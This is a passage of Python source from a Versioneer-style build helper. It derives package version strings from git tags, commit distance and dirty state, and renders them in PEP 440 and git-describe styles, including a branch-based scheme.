tree.\n """"""\n if not os.path.exists(os.path.join(root, "".git"")):\n if verbose:\n print(""no .git in %%s"" %% root)\n raise NotThisMethod(""no .git directory"")\n\n GITS = [""git""]\n if sys.platform == ""win32"":\n GITS = [""git.cmd"", ""git.exe""]\n # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]\n # if there isn\'t one, this yields HEX[-dirty] (no NUM). Note, for git v1.7\n # and below, it is necessary to run ""git update-index --refresh"" first.\n describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",\n ""--always"", ""--long"",\n ""--match"", ""%%s*"" %% tag_prefix],\n cwd=root)\n # --long was added in git-1.5.5\n if describe_out is None:\n raise NotThisMethod(""\'git describe\' failed"")\n describe_out = describe_out.strip()\n full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)\n if full_out is None:\n raise NotThisMethod(""\'git rev-parse\' failed"")\n full_out = full_out.strip()\n\n pieces = {}\n pieces[""long""] = full_out\n pieces[""short""] = full_out[:7] # maybe improved later\n pieces[""error""] = None\n\n # abbrev-ref available with git >= 1.7\n branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],\n cwd=root).strip()\n if branch_name == \'HEAD\':\n branches = run_command(GITS, [""branch"", ""--contains""],\n cwd=root).split(\'\\n\')\n branches = [branch[2:] for branch in branches if branch[4:5] != \'(\']\n if \'master\' in branches:\n branch_name = \'master\'\n elif not branches:\n branch_name = None\n else:\n # Pick the first branch that is returned. Good or bad.\n branch_name = branches[0]\n\n pieces[\'branch\'] = branch_name\n\n # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]\n # TAG might have hyphens.\n git_describe = describe_out\n\n # look for -dirty suffix\n dirty = git_describe.endswith(""-dirty"")\n pieces[""dirty""] = dirty\n if dirty:\n git_describe = git_describe[:git_describe.rindex(""-dirty"")]\n\n # now we have TAG-NUM-gHEX or HEX\n\n if ""-"" in git_describe:\n # TAG-NUM-gHEX\n mo = re.search(r\'^(.+)-(\\d+)-g([0-9a-f]+)$\', git_describe)\n if not mo:\n # unparseable. Maybe git-describe is misbehaving?\n pieces[""error""] = (""unable to parse git-describe output: \'%%s\'""\n %% describe_out)\n return pieces\n\n # tag\n full_tag = mo.group(1)\n if not full_tag.startswith(tag_prefix):\n if verbose:\n fmt = ""tag \'%%s\' doesn\'t start with prefix \'%%s\'""\n print(fmt %% (full_tag, tag_prefix))\n pieces[""error""] = (""tag \'%%s\' doesn\'t start with prefix \'%%s\'""\n %% (full_tag, tag_prefix))\n return pieces\n pieces[""closest-tag""] = full_tag[len(tag_prefix):]\n\n # distance: number of commits since tag\n pieces[""distance""] = int(mo.group(2))\n\n # commit: short hex revision ID\n pieces[""short""] = mo.group(3)\n\n else:\n # HEX: no tags\n pieces[""closest-tag""] = None\n count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],\n cwd=root)\n pieces[""distance""] = int(count_out) # total number of commits\n\n return pieces\n\n\n# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.\ndefault_maint_branch_regexp = "".*([0-9]+\\.)+x$""\n\n\ndef plus_or_dot(pieces):\n """"""Return a + if we don\'t already have one, else return a .""""""\n if ""+"" in pieces.get(""closest-tag"", """"):\n return "".""\n return ""+""\n\n\ndef render_pep440(pieces):\n """"""Build up version string, with post-release ""local version identifier"".\n\n Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you\n get a tagged build and then dirty it, you\'ll get TAG+0.gHEX.dirty\n\n Exceptions:\n 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += plus_or_dot(pieces)\n rendered += ""%%d.g%%s"" %% (pieces[""distance""], pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n else:\n # exception #1\n rendered = ""0+untagged.%%d.g%%s"" %% (pieces[""distance""],\n pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n return rendered\n\n\ndef render_pep440_pre(pieces):\n """"""TAG[.post.devDISTANCE] -- No -dirty.\n\n Exceptions:\n 1: no tags. 0.post.devDISTANCE\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post.dev%%d"" %% pieces[""distance""]\n else:\n # exception #1\n rendered = ""0.post.dev%%d"" %% pieces[""distance""]\n return rendered\n\n\ndef render_pep440_post(pieces):\n """"""TAG[.postDISTANCE[.dev0]+gHEX] .\n\n The "".dev0"" means dirty. Note that .dev0 sorts backwards\n (a dirty tree will appear ""older"" than the corresponding clean one),\n but you shouldn\'t be releasing software with -dirty anyways.\n\n Exceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += plus_or_dot(pieces)\n rendered += ""g%%s"" %% pieces[""short""]\n else:\n # exception #1\n rendered = ""0.post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += ""+g%%s"" %% pieces[""short""]\n return rendered\n\n\ndef render_pep440_old(pieces):\n """"""TAG[.postDISTANCE[.dev0]] .\n\n The "".dev0"" means dirty.\n\n Eexceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n else:\n # exception #1\n rendered = ""0.post%%d"" %% pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n return rendered\n\n\ndef render_git_describe(pieces):\n """"""TAG[-DISTANCE-gHEX][-dirty].\n\n Like \'git describe --tags --dirty --always\'.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef render_git_describe_long(pieces):\n """"""TAG-DISTANCE-gHEX[-dirty].\n\n Like \'git describe --tags --dirty --always -long\'.\n The distance/hash is unconditional.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n rendered += ""-%%d-g%%s"" %% (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef add_one_to_version(version_string, number_index_to_increment=-1):\n """"""\n Add one to a version string at the given numeric indices.\n\n >>> add_one_to_version(\'v1.2.3\')\n \'v1.2.4\'\n\n """"""\n # Break up the tag by number groups (preserving multi-digit\n # numbers as multidigit)\n parts = re.split(""([0-9]+)"", version_string)\n\n digit_parts = [(i, part) for i, part in enumerate(parts)\n if part.isdigit()]\n\n # Deal with negative indexing.\n increment_at_index = ((number_index_to_increment + len(digit_parts))\n %% len(digit_parts))\n for n_seen, (i, part) in enumerate(digit_parts):\n if n_seen == increment_at_index:\n parts[i] = str(int(part) + 1)\n elif n_seen > increment_at_index:\n parts[i] = \'0\'\n return \'\'.join(parts)\n\n\ndef render_pep440_branch_based(pieces):\n # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is\n # included for dirty.\n\n # exceptions:\n # 1: no tags. 0.0.0.devDISTANCE[+gHEX]\n\n replacements = {\' \': \'.\', \'(\': \'\', \')\': \'\'}\n [branch_name] = [pieces.get(\'branch\').replace(old, new)\n for old, new in replacements.items()]\n master = branch_name == \'master\'\n maint = re.match(default_maint_branch_regexp,\n branch_name or \'\')\n\n # If we are on a tag, just pep440-pre it.\n if pieces[""closest-tag""] and not (pieces[""distance""] or\n pieces[""dirty""]):\n rendered = pieces[""closest-tag""]\n else:\n # Put a default closest-tag in.\n if not pieces[""closest-tag""]:\n pieces[""closest-tag""] = \'0.0.0\'\n\n if pieces[""distance""] or pieces[""dirty""]:\n if maint:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post%%d"" %% pieces[""distance""]\n else:\n rendered = add_one_to_version(pieces[""closest-tag""])\n if pieces[""distance""]:\n rendered += "".dev%%d"" %% pieces[""distance""]\n\n suffix = []\n # Put the branch name in if it isn\'t master nor a\n # maintenance branch.\n if not (master or maint):\n suffix.append(\'%%s\' %% (branch_name or \'unknown_branch\'))\n\n if pieces[""dirty""]:\n suffix.append(\'g%%s\' %% pieces[""short""])\n rendered += \'+%%s\' %% \'\'.join(suffix)\n else:\n rendered = pieces[""closest-tag""]\n return rendered\n\n\nSTYLES = {\'default\': render_pep440,\n \'pep440\': render_pep440,\n \'pep440-pre\': render_pep440_pre,\n \'pep440-post\': render_pep440_post,\n \'pep440-old\': render_pep440_old,\n \'git-describe\': render_git_describe,\n \'git-describe-long\': render_git_describe_long,\n \'pep440-old\': render_pep440_old,\n \'pep440-branch-based\': render_pep440_branch_based,\n }\n\n\ndef render(pieces, style):\n """"""Render the given version pieces into the requested style.""""""\n if pieces[""error""]:\n return {""version"": ""unknown"",\n ""full-revisionid"": pieces.get(""long""),\n ""dirty"": None,\n ""error"": pieces[""error""]}\n\n if not style:\n style = \'default\'\n\n renderer = STYLES.get(style)\n\n if not renderer:\n raise ValueError(""unknown style \'%%s\'"" %% style)\n\n rendered = renderer(pieces)\n\n return {""version"": rendered, ""full-revisionid"": pieces[""long""],\n ""dirty"": pieces[""dirty""], ""error"": None}\n\n\ndef get_versions():\n """"""Get version information or return default if unable to do so.""""""\n # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have\n # __file__, we can work backwards from there to the root. Some\n # py2exe/bbfreeze/non-CPython implementations don\'t do __file__, in which\n # case we can only use expanded keywords.\n\n cfg = get_config()\n verbose = cfg.verbose\n\n try:\n return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,\n verbose)\n except NotThisMethod:\n pass\n\n try:\n root = os.path.realpath(__file__)\n # versionfile_source is the relative path from the top of the source\n # tree (where the .git directory might live) to this file. Invert\n # this to find the root from __file__.\n for i in cfg.versionfile_source.split(\'/\'):\n root = os.path.dirname(root)\n except NameError:\n return {""version"": ""0+unknown"", ""full-revisionid"": None,\n ""dirty"": None,\n ""error"": ""unable to find root of source tree""}\n\n try:\n pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)\n return render(pieces, cfg.style)\n except NotThisMethod:\n pass\n\n try:\n if cfg.parentdir_prefix:\n return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)\n except NotThisMethod:\n pass\n\n return {""version"": ""0+unknown"", ""full-revisionid"": None,\n ""dirty"": None,\n ""error"": ""unable to compute version""}\n\'\'\'\n\n\n@register_vcs_handler(""git"", ""get_keywords"")\ndef git_get_keywords(versionfile_abs):\n """"""Extract version information from the given file.""""""\n # the code embedded in _version.py can just fetch the value of these\n # keywords. When used from setup.py, we don\'t want to import _version.py,\n # so we do it with a regexp instead. This function is not used from\n # _version.py.\n keywords = {}\n try:\n f = open(versionfile_abs, ""r"")\n for line in f.readlines():\n if line.strip().startswith(""git_refnames =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""refnames""] = mo.group(1)\n if line.strip().startswith(""git_full =""):\n mo = re.search(r\'=\\s*""(.*)""\', line)\n if mo:\n keywords[""full""] = mo.group(1)\n f.close()\n except EnvironmentError:\n pass\n return keywords\n\n\n@register_vcs_handler(""git"", ""keywords"")\ndef git_versions_from_keywords(keywords, tag_prefix, verbose):\n """"""Get version information from git keywords.""""""\n if not keywords:\n raise NotThisMethod(""no keywords at all, weird"")\n refnames = keywords[""refnames""].strip()\n if refnames.startswith(""$Format""):\n if verbose:\n print(""keywords are unexpanded, not using"")\n raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"")\n refs = [r.strip() for r in refnames.strip(""()"").split("","")]\n # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of\n # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those.\n TAG = ""tag: ""\n tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])\n if not tags:\n # Either we\'re using git < 1.8.3, or there really are no tags. We use\n # a heuristic: assume all version tags have a digit. The old git %d\n # expansion behaves like git log --decorate=short and strips out the\n # refs/heads/ and refs/tags/ prefixes that would let us distinguish\n # between branches and tags. By ignoring refnames without digits, we\n # filter out many common branch names like ""release"" and\n # ""stabilization"", as well as ""HEAD"" and ""master"".\n tags = set([r for r in refs if re.search(r\'\\d\', r)])\n if verbose:\n print(""discarding \'%s\', no digits"" % "","".join(set(refs) - tags))\n if verbose:\n print(""likely tags: %s"" % "","".join(sorted(tags)))\n for ref in sorted(tags):\n # sorting will prefer e.g. ""2.0"" over ""2.0rc1""\n if ref.startswith(tag_prefix):\n r = ref[len(tag_prefix):]\n if verbose:\n print(""picking %s"" % r)\n return {""version"": r,\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": None, ""branch"": None\n }\n # no suitable tags, so version is ""0+unknown"", but full hex is still there\n if verbose:\n print(""no suitable tags, using unknown + full revision id"")\n return {""version"": ""0+unknown"",\n ""full-revisionid"": keywords[""full""].strip(),\n ""dirty"": False, ""error"": ""no suitable tags"",\n ""branch"": None}\n\n\n@register_vcs_handler(""git"", ""pieces_from_vcs"")\ndef git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):\n """"""Get version from \'git describe\' in the root of the source tree.\n\n This only gets called if the git-archive \'subst\' keywords were *not*\n expanded, and _version.py hasn\'t already been rewritten with a short\n version string, meaning we\'re inside a checked out source tree.\n """"""\n if not os.path.exists(os.path.join(root, "".git"")):\n if verbose:\n print(""no .git in %s"" % root)\n raise NotThisMethod(""no .git directory"")\n\n GITS = [""git""]\n if sys.platform == ""win32"":\n GITS = [""git.cmd"", ""git.exe""]\n # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]\n # if there isn\'t one, this yields HEX[-dirty] (no NUM). Note, for git v1.7\n # and below, it is necessary to run ""git update-index --refresh"" first.\n describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"",\n ""--always"", ""--long"",\n ""--match"", ""%s*"" % tag_prefix],\n cwd=root)\n # --long was added in git-1.5.5\n if describe_out is None:\n raise NotThisMethod(""\'git describe\' failed"")\n describe_out = describe_out.strip()\n full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root)\n if full_out is None:\n raise NotThisMethod(""\'git rev-parse\' failed"")\n full_out = full_out.strip()\n\n pieces = {}\n pieces[""long""] = full_out\n pieces[""short""] = full_out[:7] # maybe improved later\n pieces[""error""] = None\n\n # abbrev-ref available with git >= 1.7\n branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""],\n cwd=root).strip()\n if branch_name == \'HEAD\':\n branches = run_command(GITS, [""branch"", ""--contains""],\n cwd=root).split(\'\\n\')\n branches = [branch[2:] for branch in branches if branch[4:5] != \'(\']\n if \'master\' in branches:\n branch_name = \'master\'\n elif not branches:\n branch_name = None\n else:\n # Pick the first branch that is returned. Good or bad.\n branch_name = branches[0]\n\n pieces[\'branch\'] = branch_name\n\n # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]\n # TAG might have hyphens.\n git_describe = describe_out\n\n # look for -dirty suffix\n dirty = git_describe.endswith(""-dirty"")\n pieces[""dirty""] = dirty\n if dirty:\n git_describe = git_describe[:git_describe.rindex(""-dirty"")]\n\n # now we have TAG-NUM-gHEX or HEX\n\n if ""-"" in git_describe:\n # TAG-NUM-gHEX\n mo = re.search(r\'^(.+)-(\\d+)-g([0-9a-f]+)$\', git_describe)\n if not mo:\n # unparseable. Maybe git-describe is misbehaving?\n pieces[""error""] = (""unable to parse git-describe output: \'%s\'""\n % describe_out)\n return pieces\n\n # tag\n full_tag = mo.group(1)\n if not full_tag.startswith(tag_prefix):\n if verbose:\n fmt = ""tag \'%s\' doesn\'t start with prefix \'%s\'""\n print(fmt % (full_tag, tag_prefix))\n pieces[""error""] = (""tag \'%s\' doesn\'t start with prefix \'%s\'""\n % (full_tag, tag_prefix))\n return pieces\n pieces[""closest-tag""] = full_tag[len(tag_prefix):]\n\n # distance: number of commits since tag\n pieces[""distance""] = int(mo.group(2))\n\n # commit: short hex revision ID\n pieces[""short""] = mo.group(3)\n\n else:\n # HEX: no tags\n pieces[""closest-tag""] = None\n count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""],\n cwd=root)\n pieces[""distance""] = int(count_out) # total number of commits\n\n return pieces\n\n\ndef do_vcs_install(manifest_in, versionfile_source, ipy):\n """"""Git-specific installation logic for Versioneer.\n\n For Git, this means creating/changing .gitattributes to mark _version.py\n for export-time keyword substitution.\n """"""\n GITS = [""git""]\n if sys.platform == ""win32"":\n GITS = [""git.cmd"", ""git.exe""]\n files = [manifest_in, versionfile_source]\n if ipy:\n files.append(ipy)\n try:\n me = __file__\n if me.endswith("".pyc"") or me.endswith("".pyo""):\n me = os.path.splitext(me)[0] + "".py""\n versioneer_file = os.path.relpath(me)\n except NameError:\n versioneer_file = ""versioneer.py""\n files.append(versioneer_file)\n present = False\n try:\n f = open("".gitattributes"", ""r"")\n for line in f.readlines():\n if line.strip().startswith(versionfile_source):\n if ""export-subst"" in line.strip().split()[1:]:\n present = True\n f.close()\n except EnvironmentError:\n pass\n if not present:\n f = open("".gitattributes"", ""a+"")\n f.write(""%s export-subst\\n"" % versionfile_source)\n f.close()\n files.append("".gitattributes"")\n run_command(GITS, [""add"", ""--""] + files)\n\n\ndef versions_from_parentdir(parentdir_prefix, root, verbose):\n """"""Try to determine the version from the parent directory name.\n\n Source tarballs conventionally unpack into a directory that includes\n both the project name and a version string.\n """"""\n dirname = os.path.basename(root)\n if not dirname.startswith(parentdir_prefix):\n if verbose:\n print(""guessing rootdir is \'%s\', but \'%s\' doesn\'t start with ""\n ""prefix \'%s\'"" % (root, dirname, parentdir_prefix))\n raise NotThisMethod(""rootdir doesn\'t start with parentdir_prefix"")\n return {""version"": dirname[len(parentdir_prefix):],\n ""full-revisionid"": None,\n ""dirty"": False, ""error"": None}\n\nSHORT_VERSION_PY = """"""\n# This file was generated by \'versioneer.py\' (0.15+dev) from\n# revision-control system data, or from the parent directory name of an\n# unpacked source archive. Distribution tarballs contain a pre-generated copy\n# of this file.\n\nimport json\nimport sys\n\nversion_json = \'\'\'\n%s\n\'\'\' # END VERSION_JSON\n\n\ndef get_versions():\n return json.loads(version_json)\n""""""\n\n\ndef versions_from_file(filename):\n """"""Try to determine the version from _version.py if present.""""""\n try:\n with open(filename) as f:\n contents = f.read()\n except EnvironmentError:\n raise NotThisMethod(""unable to read _version.py"")\n mo = re.search(r""version_json = \'\'\'\\n(.*)\'\'\' # END VERSION_JSON"",\n contents, re.M | re.S)\n if not mo:\n raise NotThisMethod(""no version_json in _version.py"")\n return json.loads(mo.group(1))\n\n\ndef write_to_version_file(filename, versions):\n """"""Write the given version number to the given _version.py file.""""""\n os.unlink(filename)\n contents = json.dumps(versions, sort_keys=True,\n indent=1, separators=("","", "": ""))\n with open(filename, ""w"") as f:\n f.write(SHORT_VERSION_PY % contents)\n\n print(""set %s to \'%s\'"" % (filename, versions[""version""]))\n\n# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc.\ndefault_maint_branch_regexp = "".*([0-9]+\\.)+x$""\n\n\ndef plus_or_dot(pieces):\n """"""Return a + if we don\'t already have one, else return a .""""""\n if ""+"" in pieces.get(""closest-tag"", """"):\n return "".""\n return ""+""\n\n\ndef render_pep440(pieces):\n """"""Build up version string, with post-release ""local version identifier"".\n\n Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you\n get a tagged build and then dirty it, you\'ll get TAG+0.gHEX.dirty\n\n Exceptions:\n 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += plus_or_dot(pieces)\n rendered += ""%d.g%s"" % (pieces[""distance""], pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n else:\n # exception #1\n rendered = ""0+untagged.%d.g%s"" % (pieces[""distance""],\n pieces[""short""])\n if pieces[""dirty""]:\n rendered += "".dirty""\n return rendered\n\n\ndef render_pep440_pre(pieces):\n """"""TAG[.post.devDISTANCE] -- No -dirty.\n\n Exceptions:\n 1: no tags. 0.post.devDISTANCE\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post.dev%d"" % pieces[""distance""]\n else:\n # exception #1\n rendered = ""0.post.dev%d"" % pieces[""distance""]\n return rendered\n\n\ndef render_pep440_post(pieces):\n """"""TAG[.postDISTANCE[.dev0]+gHEX] .\n\n The "".dev0"" means dirty. Note that .dev0 sorts backwards\n (a dirty tree will appear ""older"" than the corresponding clean one),\n but you shouldn\'t be releasing software with -dirty anyways.\n\n Exceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += plus_or_dot(pieces)\n rendered += ""g%s"" % pieces[""short""]\n else:\n # exception #1\n rendered = ""0.post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n rendered += ""+g%s"" % pieces[""short""]\n return rendered\n\n\ndef render_pep440_old(pieces):\n """"""TAG[.postDISTANCE[.dev0]] .\n\n The "".dev0"" means dirty.\n\n Eexceptions:\n 1: no tags. 0.postDISTANCE[.dev0]\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""] or pieces[""dirty""]:\n rendered += "".post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n else:\n # exception #1\n rendered = ""0.post%d"" % pieces[""distance""]\n if pieces[""dirty""]:\n rendered += "".dev0""\n return rendered\n\n\ndef render_git_describe(pieces):\n """"""TAG[-DISTANCE-gHEX][-dirty].\n\n Like \'git describe --tags --dirty --always\'.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef render_git_describe_long(pieces):\n """"""TAG-DISTANCE-gHEX[-dirty].\n\n Like \'git describe --tags --dirty --always -long\'.\n The distance/hash is unconditional.\n\n Exceptions:\n 1: no tags. HEX[-dirty] (note: no \'g\' prefix)\n """"""\n if pieces[""closest-tag""]:\n rendered = pieces[""closest-tag""]\n rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])\n else:\n # exception #1\n rendered = pieces[""short""]\n if pieces[""dirty""]:\n rendered += ""-dirty""\n return rendered\n\n\ndef add_one_to_version(version_string, number_index_to_increment=-1):\n """"""\n Add one to a version string at the given numeric indices.\n\n >>> add_one_to_version(\'v1.2.3\')\n \'v1.2.4\'\n\n """"""\n # Break up the tag by number groups (preserving multi-digit\n # numbers as multidigit)\n parts = re.split(""([0-9]+)"", version_string)\n\n digit_parts = [(i, part) for i, part in enumerate(parts)\n if part.isdigit()]\n\n # Deal with negative indexing.\n increment_at_index = ((number_index_to_increment + len(digit_parts))\n % len(digit_parts))\n for n_seen, (i, part) in enumerate(digit_parts):\n if n_seen == increment_at_index:\n parts[i] = str(int(part) + 1)\n elif n_seen > increment_at_index:\n parts[i] = \'0\'\n return \'\'.join(parts)\n\n\ndef render_pep440_branch_based(pieces):\n # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is\n # included for dirty.\n\n # exceptions:\n # 1: no tags. 0.0.0.devDISTANCE[+gHEX]\n\n replacements = {\' \': \'.\', \'(\': \'\', \')\': \'\'}\n branch_name = pieces.get(\'branch\')\n for old, new in replacements.items():\n branch_name = branch_name.replace(old, new)\n master = branch_name == \'master\'\n maint = re.match(default_maint_branch_regexp,\n branch_name or \'\')\n\n # If we are on a tag, just pep440-pre it.\n if pieces[""closest-tag""] and not (pieces[""distance""] or\n pieces[""dirty""]):\n rendered = pieces[""closest-tag""]\n else:\n # Put a default closest-tag in.\n if not pieces[""closest-tag""]:\n pieces[""closest-tag""] = \'0.0.0\'\n\n if pieces[""distance""] or pieces[""dirty""]:\n if maint:\n rendered = pieces[""closest-tag""]\n if pieces[""distance""]:\n rendered += "".post%d"" % pieces[""distance""]\n else:\n rendered = add_one_to_version(pieces[""closest-tag""])\n if pieces[""distance""]:\n rendered += "".dev%d"" % pieces[""distance""]\n\n suffix = []\n # Put the branch name in if it isn\'t master nor a\n # maintenance branch.\n if not (master or maint):\n suffix.append(\'%s\' % (branch_name or \'unknown_branch\'))\n\n if pieces[""dirty""]:\n suffix.append(\'g%s\' % pieces[""short""])\n rendered += \'+%s\' % \'\'.join(suffix)\n else:\n rendered = pieces[""closest-tag""]\n return rendered\n\n\nSTYLES = {\'default\': render_pep440,\n \'pep440\': render_pep440,\n \'pep440-pre\': render_pep440_pre,\n \'pep440-post\': render_pep440_post,\n \'pep440-old\': render_pep440_old,\n \'git-describe\': render_git_describe,\n \'git-describe-long\': render_git_describe_long,\n \'pep440-old\': render_pep440_old,\n \'pep440-branch-based\': render_pep440_branch_based,\n }\n\n\ndef render(pieces, style):\n """"""Render the given version pieces into the requested style.""""""\n if pieces[""error""]:\n return {""version"": ""unknown"",\n ""full-revisionid"": pieces.get(""long""),\n ""dirty"": None,\n ""error"": pieces[""error""]}\n\n if not style:\n style = \'default\'\n\n renderer = STYLES.get(style)\n\n if not renderer:\n raise ValueError(""unknown style \'%s\'"" % style)\n\n rendered = renderer(pieces)\n\n return {""version"": rendered, ""full-revisionid"": pieces[""long""],\n ""dirty"": pieces[""dirty""], ""error"": None}\n\n\nclass VersioneerBadRootError(Exception):\n\n """"""The project root directory is unknown or missing key files.""""""\n\n\ndef get_versions(verbose=False):\n """"""Get the project version from whatever source is available.\n\n Returns dict with two keys: \'version\' and \'full\'.\n """"""\n if ""versioneer"" in sys.modules:\n # see the discussion in cmdclass.py:get_cmdclass()\n del sys.modules[""versioneer""]\n\n root = get_root()\n cfg = get_config_from_root(root)\n\n assert cfg.VCS is not None, ""please set [versioneer]VCS= in setup.cfg""\n handlers = HANDLERS.get(cfg.VCS)\n assert handlers, ""unrecognized VCS \'%s\'"" % cfg.VCS\n verbose = verbose or cfg.verbose\n assert cfg.versionfile_source is not None, \\\n ""please set versioneer.versionfile_source""\n assert cfg.tag_prefix is not None, ""please set versioneer.tag_prefix""\n\n versionfile_abs = os.path.join(root, cfg.versionfile_source)\n\n # extract version from first of: _version.py, VCS command (e.g. \'git\n # describe\'), parentdir. This is meant to work for developers using a\n # source checkout, for users of a tarball created by \'setup.py sdist\',\n # and for users of a tarball/zipball created by \'git archive\' or github\'s\n # download-from-tag feature or the equivalent in other VCSes.\n\n get_keywords_f = handlers.get(""get_keywords"")\n from_keywords_f = handlers.get(""keywords"")\n if get_keywords_f and from_keywords_f:\n try:\n keywords = get_keywords_f(versionfile_abs)\n ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)\n if verbose:\n print(""got version from expanded keyword %s"" % ver)\n return ver\n except NotThisMethod:\n pass\n\n try:\n ver = versions_from_file(versionfile_abs)\n if verbose:\n print(""got version from file %s %s"" % (versionfile_abs, ver))\n return ver\n except NotThisMethod:\n pass\n\n from_vcs_f = handlers.get(""pieces_from_vcs"")\n if from_vcs_f:\n try:\n pieces = from_vcs_f(cfg.tag_prefix, root, verbose)\n ver = render(pieces, cfg.style)\n if verbose:\n print(""got version from VCS %s"" % ver)\n return ver\n except NotThisMethod:\n pass\n\n try:\n if cfg.parentdir_prefix:\n ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)\n if verbose:\n print(""got version from parentdir %s"" % ver)\n return ver\n except NotThisMethod:\n pass\n\n if verbose:\n print(""unable to compute version"")\n\n return {""version"": ""0+unknown"", ""full-revisionid"": None,\n ""dirty"": None, ""error"": ""unable to compute version""}\n\n\ndef get_version():\n """"""Get the short version string for this project.""""""\n return get_versions()[""version""]\n\n\ndef get_cmdclass():\n """"""Get the custom setuptools/distutils subclasses used by Versioneer.""""""\n if ""versioneer"" in sys.modules:\n del sys.modules[""versioneer""]\n # this fixes the ""python setup.py develop"" case (also \'install\' and\n # \'easy_install .\'), in which subdependencies of the main project are\n # built (using setup.py bdist_egg) in the same python process. Assume\n # a main project A and a dependency B, which use different versions\n # of Versioneer. A\'s setup.py imports A\'s Versioneer, leaving it in\n # sys.modules by the time B\'s setup.py is executed, causing B to run\n # with the wrong versioneer. Setuptools wraps the sub-dep builds in a\n # sandbox that restores sys.modules to it\'s pre-build state, so the\n # parent is protected against the child\'s ""import versioneer"". By\n # removing ourselves from sys.modules here, before the child build\n # happens, we protect the child from the parent\'s versioneer too.\n # Also see https://github.com/warner/python-versioneer/issues/52\n\n cmds = {}\n\n # we add ""version"" to both distutils and setuptools\n from distutils.core import Command\n\n class 